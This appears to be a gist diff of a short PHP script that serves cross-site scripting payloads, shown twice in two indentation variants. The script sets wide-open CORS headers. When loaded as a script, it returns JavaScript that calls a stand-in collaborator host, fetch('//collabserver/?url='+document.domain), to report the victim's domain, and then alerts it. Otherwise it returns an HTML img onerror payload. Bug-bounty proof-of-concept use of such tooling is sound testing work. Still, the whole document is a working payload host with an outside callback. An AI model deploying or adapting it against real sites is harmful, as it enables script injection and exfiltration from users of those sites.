mcipekci · March 13, 2025 16:07
diff --git a/gistfile1.txt b/gistfile1.txt
 <?php
 header("Access-Control-Allow-Origin: *");
 header("Access-Control-Allow-Credentials: true");
 header("Access-Control-Allow-Methods: GET, POST, OPTIONS");
 header("Access-Control-Allow-Headers: DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range");
 header("Access-Control-Expose-Headers: Content-Length,Content-Range");
 if ($_SERVER["HTTP_SEC_FETCH_DEST"] == "script") {
    header("Content-Type: text/javascript");
    echo "fetch('//collabserver/?url='+document.domain);";
    echo "alert(document.domain)";
 } else {
    header("Content-Type: text/html");
    echo '<html><body>\'\';var msgbox;if(document.domain){alert(document.domain)}else{alert(1)}//<img src="x" onerror="if(document.domain){alert(document.domain)}else{alert(1)}">';
 }
 exit();
	<?php
	header("Access-Control-Allow-Origin: *");
	header("Access-Control-Allow-Credentials: true");
	header("Access-Control-Allow-Methods: GET, POST, OPTIONS");
	header("Access-Control-Allow-Headers: DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range");
	header("Access-Control-Expose-Headers: Content-Length,Content-Range");
	if ($_SERVER["HTTP_SEC_FETCH_DEST"] == "script") {
	header("Content-Type: text/javascript");
	echo "fetch('//collabserver/?url='+document.domain);";
	echo "alert(document.domain)";
	} else {
	header("Content-Type: text/html");
	echo '<html><body>\'\';var msgbox;if(document.domain){alert(document.domain)}else{alert(1)}//<img src="x" onerror="if(document.domain){alert(document.domain)}else{alert(1)}">';
	}
	exit();